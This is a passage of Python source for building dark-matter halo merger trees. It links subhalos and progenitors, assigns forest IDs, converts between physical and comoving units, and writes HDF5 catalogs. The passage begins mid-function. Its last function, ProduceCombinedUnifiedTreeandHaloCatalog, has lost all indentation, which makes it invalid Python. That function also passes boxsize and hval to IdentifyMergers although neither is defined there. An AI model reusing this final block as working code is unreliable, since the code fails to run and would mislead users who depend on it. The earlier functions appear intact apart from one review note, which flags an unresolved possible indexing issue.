                                        nextidval=halodata[starthalosnap]["Tail"][starthaloindex]
                                        nextsnapval=halodata[starthalosnap]["TailSnap"][starthaloindex]
                                        nextindexval=int(nextidval%TEMPORALHALOIDVAL-1)
                                        starthaloid=nextidval
                                        starthalosnap=nextsnapval
                                        starthaloindex=nextindexval
                                        nextidval=halodata[startmergersnap]["Tail"][startmergerindex]
                                        nextsnapval=halodata[startmergersnap]["TailSnap"][startmergerindex]
                                        nextindexval=int(nextidval%TEMPORALHALOIDVAL-1)
                                        startmergerid=nextidval
                                        startmergersnap=nextsnapval
                                        startmergerindex=nextindexval
                                    #store timescale of merger
                                    deltamergertime=(mergerstartsnap-progsnap)
                                    #set this as the merger for all halos from this point onwards till reach head or halo with non-zero merger
                                    merginghaloindex=mergerstartindex
                                    merginghaloid=mergerstartid
                                    merginghalosnap=mergerstartsnap
                                    oldmerginghaloid=merginghaloid
                                    #print "Merger found ",progsnap,mergerstartsnap, halodata[progsnap]["Mass_tot"][NN]/halodata[progsnap]["Mass_tot"][progindex],
                                    #print halodata[startmergersnap]["Mass_tot"][startmergerindex]/halodata[starthalosnap]["Mass_tot"][starthaloindex]
                                    #now set merger time for all later haloes unless an new merger has happened
                                    while (oldmerginghaloid!=halodata[progsnap]["RootHead"][progindex] and halodata[merginghalosnap]["LastMergerRatio"][merginghaloindex]<0):
                                        halodata[merginghalosnap]["LastMerger"][merginghaloindex]=halodata[progsnap]["ID"][NN]
                                        halodata[merginghalosnap]["LastMergerRatio"][merginghaloindex]=halodata[progsnap]["Mass_tot"][NN]/halodata[progsnap]["Mass_tot"][progindex]
                                        halodata[merginghalosnap]["LastMergerSnap"][merginghaloindex]=progsnap
                                        halodata[merginghalosnap]["LastMergerDeltaSnap"][merginghaloindex]=deltamergertime
                                        oldmerginghaloid=merginghaloid
                                        mergingnextid=halodata[merginghalosnap]["Head"][merginghaloindex]
                                        mergingnextsnap=halodata[merginghalosnap]["HeadSnap"][merginghaloindex]
                                        mergingnextindex=int(mergingnextid%TEMPORALHALOIDVAL-1)
                                        merginghaloindex=mergingnextindex
                                        merginghaloid=mergingnextid
                                        merginghalosnap=mergingnextsnap
                #move to next step
                #a halo that is its own progenitor ends the main branch: flag the remaining
                #descendant line with "no merger" (0) and stop walking this halo
                if (haloid==progid):
                    oldhaloid=haloid
                    currentsnap=halosnap
                    currentindex=haloindex
                    currentid=haloid
                    while (oldhaloid!=halodata[progsnap]["RootHead"][progindex] and halodata[currentsnap]["LastMergerRatio"][currentindex]<0):
                        halodata[currentsnap]["LastMerger"][currentindex]=0
                        halodata[currentsnap]["LastMergerRatio"][currentindex]=0
                        nextid=halodata[currentsnap]["Head"][currentindex]
                        nextsnap=halodata[currentsnap]["HeadSnap"][currentindex]
                        nextindex=int(nextid%TEMPORALHALOIDVAL-1)
                        oldhaloid=currentid
                        currentsnap=nextsnap
                        currentid=nextid
                        currentindex=nextindex
                    break
                #otherwise step back one link along the main branch
                haloid=progid
                haloindex=progindex
                halosnap=progsnap
                progid=halodata[halosnap]["Tail"][haloindex]
                progsnap=halodata[halosnap]["TailSnap"][haloindex]
                progindex=int(progid%TEMPORALHALOIDVAL-1)
                numprog=tree[halosnap]["Num_progen"][haloindex]
                #if at end of line then move up and set last major merger to 0
        if (iverbose): print("Done snap",j,time.clock()-start)
def generate_sublinks(numhalos,halodata):
    """
    Build intrusive next/previous subhalo pointers for a single snapshot.

    For every host halo (hostHaloID == -1) the host's NextSubhalo points at
    its first subhalo's ID (or back at itself if it has none), and the
    subhalos form a chain via NextSubhalo/PreviousSubhalo, terminated by the
    last subhalo pointing at itself.  Note the first subhalo's
    PreviousSubhalo is set to its own ID (not the host's) and the host's
    PreviousSubhalo is its own ID.  Modifies halodata in place.
    """
    if (numhalos==0):
        return
    hostindices=np.where(halodata['hostHaloID']==-1)[0]
    for hostidx in hostindices:
        hostid=halodata['ID'][hostidx]
        #host's previous pointer terminates at itself
        halodata['PreviousSubhalo'][hostidx]=hostid
        subidx=np.where((halodata["hostHaloID"]==hostid))[0]
        if (len(subidx)==0):
            #no subhalos: host's next pointer also terminates at itself
            halodata['NextSubhalo'][hostidx]=hostid
            continue
        #host points at the first subhalo; first subhalo's previous is itself
        halodata['NextSubhalo'][hostidx]=halodata['ID'][subidx[0]]
        halodata['PreviousSubhalo'][subidx[0]]=halodata['ID'][subidx[0]]
        #chain consecutive subhalos together
        for icur,inext in zip(subidx[:-1],subidx[1:]):
            halodata['NextSubhalo'][icur]=halodata['ID'][inext]
            halodata['PreviousSubhalo'][inext]=halodata['ID'][icur]
        #last subhalo terminates the chain at itself
        halodata['NextSubhalo'][subidx[-1]]=halodata['ID'][subidx[-1]]
def GenerateSubhaloLinks(numsnaps,numhalos,halodata,TEMPORALHALOIDVAL=1000000000000, iverbose=0, iparallel=0):
    """
    This code generates a quick way of moving across a halo's subhalo list
    The code is passed
    - the number of snapshots,
    - an array of the number of haloes per snapshot,
    - the halodata dictionary structure which must contain the halo merger tree based keys, Head, RootHead, etc, and mass, phase-space positions of haloes,
    and other desired properties

    Adds "NextSubhalo"/"PreviousSubhalo" arrays to every snapshot (filled by
    generate_sublinks).  If iparallel is set, snapshots are processed in
    batches of multiprocessing workers.
    """
    #time.clock was removed in Python 3.8; fall back to perf_counter on newer interpreters
    clock=getattr(time,'clock',time.perf_counter)
    for j in range(numsnaps):
        #allocate the link arrays; generate_sublinks fills them per snapshot
        halodata[j]["NextSubhalo"]=np.zeros(numhalos[j],dtype=np.int64)
        halodata[j]["PreviousSubhalo"]=np.zeros(numhalos[j],dtype=np.int64)
    #iterate over all host halos and set their subhalo links
    start=clock()
    nthreads=1
    if (iparallel):
        manager=mp.Manager()
        nthreads=int(min(mp.cpu_count(),numsnaps))
        print("Number of threads is ",nthreads)
    for j in range(0,numsnaps,nthreads):
        start2=clock()
        if (iparallel):
            #BUGFIX: was numsnaps-1-j, which dropped the final snapshot of the
            #last batch; clamp to the number of snapshots actually remaining
            activenthreads=min(nthreads,numsnaps-j)
            processes=[mp.Process(target=generate_sublinks,args=(numhalos[j+k],halodata[j+k])) for k in range(activenthreads)]
            for p in processes:
                p.start()
            for p in processes:
                p.join()
            if (iverbose): print("Done snaps",j,"to",j+nthreads,clock()-start2)
        else:
            generate_sublinks(numhalos[j],halodata[j])
            if (iverbose): print("Done snap",j,clock()-start2)
    print("Done subhalolinks ",clock()-start)
def GenerateProgenitorLinks(numsnaps,numhalos,halodata,nsnapsearch=4,TEMPORALHALOIDVAL=1000000000000, iverbose=1):
    """
    This code generates a quick way of moving across a halo's progenitor list storing the next/previous progenitor
    The code is passed
    - the number of snapshots,
    - an array of the number of haloes per snapshot,
    - the halodata dictionary structure which must contain the halo merger tree based keys, Head, RootHead, etc, and mass, phase-space positions of haloes,
    and other desired properties

    For each unique Head at each snapshot, all haloes pointing at that Head
    within the next nsnapsearch snapshots are chained together via
    "NextProgenitor"/"PreviousProgenitor" (IDs; -1 where unset, self-ID at
    chain ends).  Modifies halodata in place.

    Fixes relative to previous revision: np.inte64 typo, search window could
    index past the last snapshot, and floor division is now used so the
    derived snapshot number is an integer index under Python 3.
    """
    #time.clock was removed in Python 3.8; fall back to perf_counter on newer interpreters
    clock=getattr(time,'clock',time.perf_counter)
    if (nsnapsearch>=numsnaps-1):
        nsnapsearch=numsnaps-1
        print("Warning, number of snaps < search size, reducing search size to numsnaps-1=",nsnapsearch)
    for j in range(numsnaps):
        #allocate links, -1 indicating no progenitor link set
        halodata[j]["NextProgenitor"]=np.ones(numhalos[j],dtype=np.int64)*-1
        halodata[j]["PreviousProgenitor"]=np.ones(numhalos[j],dtype=np.int64)*-1
    #move backward in time and identify all unique heads
    start=clock()
    for j in range(1,numsnaps):
        start2=clock()
        if (numhalos[j]==0): continue
        #find all unique heads
        heads=np.unique(np.array(np.int64(halodata[j]['Head'])))
        #for these heads identify all halos with this head
        for ihead in heads:
            currenttails=deque()
            #BUGFIX: clamp the window to numsnaps so we never index past the last snapshot
            for k in range(j,min(j+nsnapsearch,numsnaps)):
                w=np.where(halodata[k]['Head']==ihead)
                if (len(w[0])>0):
                    currenttails.extend(np.nditer(np.int64(halodata[k]["ID"][w])))
            if (len(currenttails)==0):
                continue
            #first tail in the chain points back at itself
            #snapshot number is recovered from the temporally unique ID
            #(// keeps it an integer index; BUGFIX for true division under Python 3)
            haloid=currenttails[0]
            haloindex=int(haloid%TEMPORALHALOIDVAL-1)
            halosnap=int(numsnaps-1-(haloid-int(haloid%TEMPORALHALOIDVAL))//TEMPORALHALOIDVAL)
            halodata[halosnap]['PreviousProgenitor'][haloindex]=np.int64(haloid)
            #chain consecutive tails together
            for itail in range(len(currenttails)-1):
                haloid=currenttails[itail]
                haloindex=int(haloid%TEMPORALHALOIDVAL-1)
                #BUGFIX: was np.inte64 (AttributeError when this line was reached)
                halosnap=np.int64(numsnaps-1-(haloid-int(haloid%TEMPORALHALOIDVAL))//TEMPORALHALOIDVAL)
                nexthaloid=currenttails[itail+1]
                nexthaloindex=int(nexthaloid%TEMPORALHALOIDVAL-1)
                nexthalosnap=np.int64(numsnaps-1-(nexthaloid-int(nexthaloid%TEMPORALHALOIDVAL))//TEMPORALHALOIDVAL)
                halodata[halosnap]['NextProgenitor'][haloindex]=np.int64(nexthaloid)
                halodata[nexthalosnap]['PreviousProgenitor'][nexthaloindex]=np.int64(haloid)
            #last tail in the chain points forward at itself
            haloid=currenttails[-1]
            haloindex=int(haloid%TEMPORALHALOIDVAL-1)
            halosnap=int(numsnaps-1-(haloid-int(haloid%TEMPORALHALOIDVAL))//TEMPORALHALOIDVAL)
            halodata[halosnap]['NextProgenitor'][haloindex]=haloid
        if (iverbose): print("Done snap",j,clock()-start2)
    print("Done progenitor links ",clock()-start)
def SetForestID(numsnaps,halodata,rootheadid,ForestID,AllRootHead,
    TEMPORALHALOIDVAL = 1000000000000,searchSnapLim = 5, ireversesnaporder=True):
    """
    Sets the forest id of halos using a roothead as a start point.
    Given an initial root head and end snapshot,
    First append the roothead to the AllRootHead list.
    search all previous snapshots for any haloes that share the same roothead.
    Also at each snapshot, find all subhaloes of all haloes sharing the same
    root head
    if the roothead of a subhalo is not present in the AllRootHead list
    then recursively call SetForestID with this subhalo's root head as start point
    if a subhalo's current host is not within the tree defined by rootheadid
    then recursively call SetForestID with this host's root head as start point
    Parameters
    ----------
    numsnaps : numpy.int32
        the number of snapshots
    halodata : dict
        the halodata dictionary structure which must contain the halo merger tree based keys (Head, RootHead), etc.
    rootheadid : numpy.int64
        the rootheadid of the tree that will be explored and have its forestID set
    ForestID : numpy.int64
        the forest id assigned to every halo found in this tree
    AllRootHead : list
        a list that stores the current set of rootheadid values that have been searched
    Optional Parameters
    -------------------
    TEMPORALHALOIDVAL : numpy.int64
        Temporal ID value that makes Halo IDs temporally unique, adding a snapshot num* this value.
        Allows one to quickly parse a Halo ID to determine the snapshot it exists at and its index.
    searchSnapLim : numpy.int32
        Maximum number of snapshots to keep searching if no new halos are identified as belonging to
        a rootheadid's tree, moving backwards in time
    ireversesnaporder : bool
        Whether dictionary data has late times starting at 0 (True, default) or at end of dictionary (False)
    Returns
    -------
    AllRootHead : list
        Updated list
    halodata : dict
        Updated halo data

    Fixes relative to previous revision: the ireversesnaporder=False branch
    referenced an undefined name (endsnap), and recursive calls now forward
    the optional parameters instead of silently reverting to the defaults.
    """
    #snapshot at which the root head lives, decoded from the temporally unique ID
    if (ireversesnaporder): endSnap = numsnaps-int(rootheadid/TEMPORALHALOIDVAL)-1
    else : endSnap = int(rootheadid/TEMPORALHALOIDVAL)
    rootheadindex=int(rootheadid%TEMPORALHALOIDVAL-1)
    AllRootHead.append(rootheadid)
    #set the forest level of this searched tree:
    #if this object is a host at final snap then set the forest level to 0
    #otherwise set the ForestLevel to 1
    ForestLevel=1*(halodata[endSnap]["hostHaloID"][rootheadindex]!=-1)
    #Indicator for amount of snapshots searched
    iSearchSnap = 0
    #set the direction of how the data will be processed
    if (ireversesnaporder): snaplist=np.arange(endSnap,numsnaps,dtype=np.int32)
    #BUGFIX: was lowercase endsnap (NameError in this branch)
    else : snaplist=np.arange(endSnap,-1,-1)
    for snap in snaplist:
        #Find which halos at this snapshot point to the RootDescendant
        sel = np.where(halodata[snap]["RootHead"]==rootheadid)[0]
        #keep track of how many snapshots there have been where there is nothing in the tree
        if(sel.size==0):
            iSearchSnap+=1
            if(iSearchSnap==searchSnapLim): break
        else: iSearchSnap = 0
        # Set all the halos within this tree within this snapshot to this forest ID
        halodata[snap]["ForestID"][sel] = ForestID
        halodata[snap]["ForestLevel"][sel] = ForestLevel
        #Lets find which halos are subhalos of the halos within the tree defined by
        #halos with the same rootheadid
        #(np.isin replaces the deprecated np.in1d; identical for these 1-d inputs)
        subHaloIndxs = np.where(np.isin(halodata[snap]["hostHaloID"],halodata[snap]["ID"][sel]))[0]
        #Lets loop over all the subhalos within this selection, which contains
        #all subhalos of any host halos within the tree defined by rootheadid
        for subHaloIndx in subHaloIndxs:
            #See if this tree has already been set
            if(halodata[snap]["RootHead"][subHaloIndx] not in AllRootHead):
                #Lets walk the subhalo's tree setting the forest ID
                AllRootHead,halodata = SetForestID(numsnaps,halodata,halodata[snap]["RootHead"][subHaloIndx],ForestID,AllRootHead,
                    TEMPORALHALOIDVAL,searchSnapLim,ireversesnaporder)
        #Extract the hosts of all subhalos in this selection that are not already in the tree defined by rootheadid
        treeSubhaloSel = (halodata[snap]["hostHaloID"][sel]!=-1) & (np.invert(np.isin(halodata[snap]["hostHaloID"][sel],halodata[snap]["ID"][sel])))
        #Get the index of these hosts that lie outside the tree
        hostIndxs = np.unique(halodata[snap]["hostHaloID"][sel][treeSubhaloSel]%TEMPORALHALOIDVAL-1).astype(int)
        #Loop over all the index for the host halos
        for hostIndx in hostIndxs:
            #See if this tree has already been set
            if(halodata[snap]["RootHead"][hostIndx] not in AllRootHead):
                #Lets walk the hosts tree setting the forest ID
                AllRootHead,halodata = SetForestID(numsnaps,halodata,halodata[snap]["RootHead"][hostIndx],ForestID,AllRootHead,
                    TEMPORALHALOIDVAL,searchSnapLim,ireversesnaporder)
    return AllRootHead,halodata
def GenerateForest(numsnaps,numhalos,halodata,atime,
    TEMPORALHALOIDVAL=1000000000000, iverbose=1, interactiontime=2, ispatialintflag=False, pos_tree=[], cosmo=dict()):
    """
    This code traces all root heads back in time identifying all interacting haloes and bundles them together into the same forest id
    The idea is to have in the halodata dictionary an associated unique forest id for all related (sub)haloes. The code also allows
    for some cleaning of the forest, specifically if a (sub)halo is only interacting for some small fraction of time, then it is not
    assigned to the forest. This can limit the size of a forest, which could otherwise become the entire halo catalog.
    Parameters
    ----------
    numsnaps : numpy.int32
        the number of snapshots
    numhalos : array
        array of the number of haloes per snapshot.
    halodata : dict
        the halodata dictionary structure which must contain the halo merger tree based keys (Head, RootHead), etc.
    atime : array
        an array of scale factors
    Optional Parameters
    -------------------
    TEMPORALHALOIDVAL : numpy.int64
        Temporal ID value that makes Halo IDs temporally unique, adding a snapshot num* this value.
        Allows one to quickly parse a Halo ID to determine the snapshot it exists at and its index.
    iverbose : int
        verbosity of function (0, minimal, 1, verbose, 2 chatterbox)
    interactiontime : int
        Optional functionality not implemented yet. Allows forest to be split if connections do not span
        more than this number of snapshots
    ispatialintflag : bool
        Flag indicating whether spatial information should be used to join forests. This requires cosmological information
    pos_tree : scikit.spatial.cKDTree
        Optional functionality not implemented yet. Allows forests to be joined if haloes
        are spatially close.
    cosmo : dict
        dictionary which has cosmological information such as box size, hval, Omega_m
    Returns
    -------
    ForestSize : numpy.array
        Update the halodata dictionary with ForestID information and also returns the size of
        the forests

    Fixes relative to previous revision: bare int64 dtype (NameError under the
    np.-qualified import style used here), recursion into SetForestID now
    forwards TEMPORALHALOIDVAL, and time.clock (removed in Python 3.8) is
    replaced by a compatible fallback.
    """
    #time.clock was removed in Python 3.8; fall back to perf_counter on newer interpreters
    clock=getattr(time,'clock',time.perf_counter)
    #initialize the dictionaries
    for j in range(numsnaps):
        #-1 marks halos not yet assigned to a forest
        halodata[j]["ForestID"]=np.ones(numhalos[j],dtype=np.int64)*-1
        halodata[j]["ForestLevel"]=np.ones(numhalos[j],dtype=np.int32)*-1
    #built KD tree to quickly search for near neighbours. only build if not passed.
    if (ispatialintflag):
        start=clock()
        boxsize=cosmo['BoxSize']
        hval=cosmo['Hubble_param']
        if (len(pos_tree)==0):
            pos=[[]for j in range(numsnaps)]
            pos_tree=[[]for j in range(numsnaps)]
            start=clock()
            if (iverbose): print("KD tree build")
            for j in range(numsnaps):
                if (numhalos[j]>0):
                    boxval=boxsize*atime[j]/hval
                    pos[j]=np.transpose(np.asarray([halodata[j]["Xc"],halodata[j]["Yc"],halodata[j]["Zc"]]))
                    pos_tree[j]=spatial.cKDTree(pos[j],boxsize=boxval)
            if (iverbose): print("done ",clock()-start)
    #now start marching backwards in time from root heads
    #identifying all subhaloes that have ever been subhaloes for long enough
    #and all progenitors and group them together into the same forest id
    forestidval=1
    start=clock()
    for j in range(numsnaps):
        start2=clock()
        if (numhalos[j]==0): continue
        #now with tree start at last snapshot and identify all root heads
        #only look at halos that are their own root head and are not subhalos
        rootheads=np.where((halodata[j]['ID']==halodata[j]['RootHead'])*(halodata[j]['hostHaloID']==-1)*(halodata[j]['ForestID']==-1))
        if (iverbose): print("At snapshot",j,len(rootheads[0]))
        for iroothead in rootheads[0]:
            #if a halo has been processed as part of a forest as a
            #result of walking the subhalo branches of a different root head
            #then move on to the next object
            if (halodata[j]['ForestID'][iroothead]!=-1): continue
            AllRootHead = []
            #begin recursively searching and setting the forest using the roothead
            #(forward TEMPORALHALOIDVAL so non-default values are honoured in the recursion)
            AllRootHead,halodata = SetForestID(numsnaps,halodata,halodata[j]["RootHead"][iroothead],forestidval,AllRootHead,
                TEMPORALHALOIDVAL=TEMPORALHALOIDVAL)
            #update forest id
            forestidval+=1
        if (iverbose): print("Done snap",j,clock()-start2)
    #get the size of each forest
    #BUGFIX: dtype was the bare name int64
    ForestSize=np.zeros(forestidval,dtype=np.int64)
    for j in range(numsnaps):
        if (numhalos[j]==0): continue
        #NOTE(review): if any ForestID is still -1 here, the -2 index wraps to the
        #end of ForestSize; the loop below patches subhalos but check coverage
        uniqueforest,counts=np.unique(halodata[j]['ForestID'],return_counts=True)
        for icount in range(len(uniqueforest)):
            ForestSize[uniqueforest[icount]-1]+=counts[icount]
        if (iverbose): print("Finished processing forest size for snap",j)
    start2=clock()
    #first identify all subhalos and see if any have subhalo connections with different than their host
    for j in range(numsnaps):
        if (numhalos[j]==0): continue
        #now with tree start at last snapshot and identify all root heads
        #only look at halos that are their own root head and are not subhalos
        missingforest=np.where((halodata[j]['ForestID']==-1))
        rootheads=np.where((halodata[j]['ID']==halodata[j]['RootHead'])*(halodata[j]['ForestID']==-1))
        subrootheads=np.where((halodata[j]['ForestID']==-1)*(halodata[j]['hostHaloID']!=-1))
        if (iverbose): print("At snapshot",j," still have ",halodata[j]['ForestID'].size,len(missingforest[0]), " with no forest id ! Of which ",len(rootheads[0])," are root heads", len(subrootheads[0]),"are subhalos")
        #if (iverbose and len(missingforest[0])>0): print("At snapshot",j," still have ",len(missingforest[0]), " with no forest id ! Of which ",len(rootheads[0])," are root heads", len(subrootheads[0]),"are subhalos")
        if (len(subrootheads[0])>0):
            #inherit the forest id and level from the host halo
            for isub in subrootheads[0]:
                hostid=halodata[j]['hostHaloID'][isub]
                hostindex=int(hostid%TEMPORALHALOIDVAL-1)
                halodata[j]['ForestID'][isub]=halodata[j]['ForestID'][hostindex]
                halodata[j]['ForestLevel'][isub]=halodata[j]['ForestLevel'][hostindex]+1
    #then return this
    print("Done generating forest",clock()-start)
    return ForestSize
"""
Adjust halo catalog for period, comoving coords, etc
"""
def AdjustforPeriod(numsnaps,numhalos,boxsize,hval,atime,halodata,icomove=0):
    """
    Wrap halo coordinates back into the primary box [0, boxval].

    A single wrap pass is applied per axis: values below 0 get +boxval, then
    values above boxval get -boxval.  boxval is comoving (boxsize/hval) when
    icomove is set, otherwise physical (boxsize*atime/hval).  Modifies
    halodata in place; numhalos is accepted for signature symmetry with the
    other adjustment routines but is not used.
    """
    for snap in range(numsnaps):
        if (icomove):
            boxval=boxsize/hval
        else:
            boxval=boxsize*atime[snap]/hval
        for axis in ("Xc","Yc","Zc"):
            coords=halodata[snap][axis]
            #shift negative positions up first, then fold any above the box down
            coords[np.where(coords<0)]+=boxval
            coords[np.where(coords>boxval)]-=boxval
def AdjustComove(itocomovefromphysnumsnaps,numsnaps,numhalos,atime,halodata,igas=0,istar=0):
    """
    Convert distance-like halo properties between physical and comoving units.

    When itocomovefromphysnumsnaps == 1 each snapshot is scaled by 1/atime
    (physical -> comoving), otherwise by atime (comoving -> physical).
    Positions, most-bound-particle positions and all characteristic radii are
    rescaled in place; gas and star counterparts are included when the igas /
    istar flags are set.  Snapshots with no halos or a unit factor are skipped.
    """
    base_keys=("Xc","Yc","Zc","Xcmbp","Ycmbp","Zcmbp",
               "Rvir","R_size","R_200mean","R_200crit","R_BN97","Rmax","R_HalfMass")
    gas_keys=("Xc_gas","Yc_gas","Zc_gas","R_HalfMass_gas")
    star_keys=("Xc_star","Yc_star","Zc_star","R_HalfMass_star")
    for snap in range(numsnaps):
        if (numhalos[snap]==0): continue
        #converting from physical to comoving, otherwise comoving to physical
        if (itocomovefromphysnumsnaps==1):
            fac=float(1.0/atime[snap])
        else:
            fac=float(atime[snap])
        #nothing to do when the scale factor is unity
        if (fac==1): continue
        keys=list(base_keys)
        if (igas):
            keys.extend(gas_keys)
        if (istar):
            keys.extend(star_keys)
        for key in keys:
            halodata[snap][key]*=fac
"""
Code to use individual snapshot files and merge them together into a full unified hdf file containing information determined from the tree
"""
def ProduceUnifiedTreeandHaloCatalog(fname,numsnaps,tree,numhalos,halodata,atime,
    descripdata={'Title':'Tree and Halo catalog of sim', 'VELOCIraptor_version':1.15, 'Tree_version':1.1, 'Particle_num_threshold':20, 'Temporal_linking_length':1, 'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False},
    cosmodata={'Omega_m':1.0, 'Omega_b':0., 'Omega_Lambda':0., 'Hubble_param':1.0,'BoxSize':1.0, 'Sigma8':1.0},
    unitdata={'UnitLength_in_Mpc':1.0, 'UnitVelocity_in_kms':1.0,'UnitMass_in_Msol':1.0, 'Flag_physical_comoving':True,'Flag_hubble_flow':False},
    partdata={'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False},
    ibuildheadtail=0, icombinefile=1):
    """
    produces a unifed HDF5 formatted file containing the full catalog plus information to walk the tree
    \ref BuildTemporalHeadTail must have been called before otherwise it is called.
    Code produces a file for each snapshot
    The keys are the same as that contained in the halo catalog dictionary with the addition of
    Num_of_snaps, and similar header info contain in the VELOCIraptor hdf files, ie Num_of_groups, Total_num_of_groups
    \todo don't know if I should use multiprocessing here to write files in parallel. IO might not be ideal

    With icombinefile==1 a single <fname>.snap.hdf.data file is written with a
    Header group and one Snap_XXX group per snapshot; otherwise one
    <fname>.snap_XXX.hdf.data file per snapshot.  A separate
    <fname>.tree.hdf.data file stores per-snapshot tree arrays (Progen/Descen
    keys are skipped).  Snapshot groups are numbered in reverse
    (numsnaps-1-i), matching the catalog's latest-first ordering.

    NOTE(review): requires h5py; partdata is accepted but the particle flags
    written actually come from descripdata — confirm which is intended.
    NOTE(review): the default dict arguments are mutable and shared across calls.
    """
    if (ibuildheadtail==1):
        #head/tail pointers not built yet; construct them first (sibling function in this module)
        BuildTemporalHeadTail(numsnaps,tree,numhalos,halodata)
    totnumhalos=sum(numhalos)
    if (icombinefile==1):
        #single combined file: one Header group plus one group per snapshot
        hdffile=h5py.File(fname+".snap.hdf.data",'w')
        headergrp=hdffile.create_group("Header")
        #store useful information such as number of snapshots, halos,
        #cosmology (Omega_m,Omega_b,Hubble_param,Omega_Lambda, Box size)
        #units (Physical [1/0] for physical/comoving flag, length in Mpc, km/s, solar masses, Gravity
        #and TEMPORALHALOIDVAL used to traverse tree information (converting halo ids to haloindex or snapshot), Reverse_order [1/0] for last snap listed first)
        #set the attributes of the header
        headergrp.attrs["NSnaps"]=numsnaps
        #overall description
        #simulation box size
        #cosmological params
        cosmogrp=headergrp.create_group("Cosmology")
        for key in cosmodata.keys():
            cosmogrp.attrs[key]=cosmodata[key]
        #unit params
        unitgrp=headergrp.create_group("Units")
        for key in unitdata.keys():
            unitgrp.attrs[key]=unitdata[key]
        #particle types
        partgrp=headergrp.create_group("Parttypes")
        partgrp.attrs["Flag_gas"]=descripdata["Flag_gas"]
        partgrp.attrs["Flag_star"]=descripdata["Flag_star"]
        partgrp.attrs["Flag_bh"]=descripdata["Flag_bh"]
        for i in range(numsnaps):
            #snapshot groups are numbered in reverse of the storage order
            snapgrp=hdffile.create_group("Snap_%03d"%(numsnaps-1-i))
            snapgrp.attrs["Snapnum"]=(numsnaps-1-i)
            snapgrp.attrs["NHalos"]=numhalos[i]
            snapgrp.attrs["scalefactor"]=atime[i]
            for key in halodata[i].keys():
                snapgrp.create_dataset(key,data=halodata[i][key])
        hdffile.close()
    else:
        #one file per snapshot, each carrying its own bookkeeping datasets
        for i in range(numsnaps):
            hdffile=h5py.File(fname+".snap_%03d.hdf.data"%(numsnaps-1-i),'w')
            hdffile.create_dataset("Snap_value",data=np.array([numsnaps-1-i],dtype=np.uint32))
            hdffile.create_dataset("NSnaps",data=np.array([numsnaps],dtype=np.uint32))
            hdffile.create_dataset("NHalos",data=np.array([numhalos[i]],dtype=np.uint64))
            hdffile.create_dataset("TotalNHalos",data=np.array([totnumhalos],dtype=np.uint64))
            hdffile.create_dataset("scalefactor",data=np.array([atime[i]],dtype=np.float64))
            for key in halodata[i].keys():
                hdffile.create_dataset(key,data=halodata[i][key])
            hdffile.close()
    #tree file holds the raw per-snapshot tree arrays
    hdffile=h5py.File(fname+".tree.hdf.data",'w')
    hdffile.create_dataset("NSnaps",data=np.array([numsnaps],dtype=np.uint32))
    hdffile.create_dataset("TotalNHalos",data=np.array([totnumhalos],dtype=np.uint64))
    hdffile.create_dataset("NHalos",data=np.array([numhalos],dtype=np.uint64))
    for i in range(numsnaps):
        snapgrp=hdffile.create_group("Snap_%03d"%(numsnaps-1-i))
        for key in tree[i].keys():
            """
            #to be completed for progenitor list
            if (key=="Progen"):
                for j in range(numhalos[i]):
                    halogrp=snapgrp.create_group("Halo"+str(j))
                    halogrp.create_dataset(key,data=tree[i][key][j])
            else:
                snapgrp.create_dataset(key,data=tree[i][key])
            """
            #ragged per-halo progenitor/descendant lists are not written (see commented block above)
            if ((key=="Progen") | (key=="Descen")): continue
            snapgrp.create_dataset(key,data=tree[i][key])
    hdffile.close()
def ProduceCombinedUnifiedTreeandHaloCatalog(fname,numsnaps,tree,numhalos,halodata,atime,
descripdata={'Title':'Tree and Halo catalog of sim', 'VELOCIraptor_version':1.15, 'Tree_version':1.1, 'Particle_num_threshold':20, 'Temporal_linking_length':1, 'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False},
cosmodata={'Omega_m':1.0, 'Omega_b':0., 'Omega_Lambda':0., 'Hubble_param':1.0,'BoxSize':1.0, 'Sigma8':1.0},
unitdata={'UnitLength_in_Mpc':1.0, 'UnitVelocity_in_kms':1.0,'UnitMass_in_Msol':1.0, 'Flag_physical_comoving':True,'Flag_hubble_flow':False},
partdata={'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False},
ibuildheadtail=0,ibuildmajormergers=0, TEMPORALHALOIDVAL=1000000000000):
"""
produces a unifed HDF5 formatted file containing the full catalog plus information to walk the tree
#ref BuildTemporalHeadTail must have been called before otherwise it is called.
Code produces a file for each snapshot
The keys are the same as that contained in the halo catalog dictionary with the addition of
Num_of_snaps, and similar header info contain in the VELOCIraptor hdf files, ie Num_of_groups, Total_num_of_groups
#todo don't know if I should use multiprocessing here to write files in parallel. IO might not be ideal
Here the halodata is the dictionary contains the information
"""
if (ibuildheadtail==1):
BuildTemporalHeadTail(numsnaps,tree,numhalos,halodata)
if (ibuildmajormergers==1):
IdentifyMergers(numsnaps,tree,numhalos,halodata,boxsize,hval,atime)
hdffile=h5py.File(fname+".snap.hdf.data",'w')
headergrp=hdffile.create_group("Header")
#store useful information such as number of snapshots, halos,
#cosmology (Omega_m,Omega_b,Hubble_param,Omega_Lambda, Box size)
#units (Physical [1/0] for physical/comoving flag, length in Mpc, km/s, solar masses, Gravity
#and TEMPORALHALOIDVAL used to traverse tree information (converting halo ids to haloindex or snapshot), Reverse_order [1/0] for last snap listed first)
#set the attributes of the header
headergrp.attrs["NSnaps"]=numsnaps
#overall description
headergrp.attrs["Title"]=descripdata["Title"]
#simulation box size
headergrp.attrs["BoxSize"]=cosmodata["BoxSize"]
findergrp=headergrp.create_group("HaloFinder")
findergrp.attrs["Name"]="VELOCIraptor"
findergrp.attrs["Version"]=descripdata["VELOCIraptor_version"]
findergrp.attrs["Particle_num_threshold"]=descripdata["Particle_num_threshold"]
treebuildergrp=headergrp.create_group("TreeBuilder")
treebuildergrp.attrs["Name"]="VELOCIraptor-Tree"
treebuildergrp.attrs["Version"]=descripdata["Tree_version"]
treebuildergrp.attrs["Temporal_linking_length"]=descripdata["Temporal_linking_length"]
#cosmological params
cosmogrp=headergrp.create_group("Cosmology")
for key in cosmodata.keys():
if (key!='BoxSize'): cosmogrp.attrs[key]=cosmodata[key]
#unit params
unitgrp=headergrp.create_group("Units")
for key in unitdata.keys():
unitgrp.attrs[key]=unitdata[key]
#particle types
partgrp=headergrp.create_group("Parttypes")
partgrp.attrs["Flag_gas"]=descripdata["Flag_gas"]
partgrp.attrs["Flag_star"]=descripdata["Flag_star"]
partgrp.attrs["Flag_bh"]=descripdata["Flag_bh"]
#now have finished with header
#now need to create groups for halos and then a group containing tree information
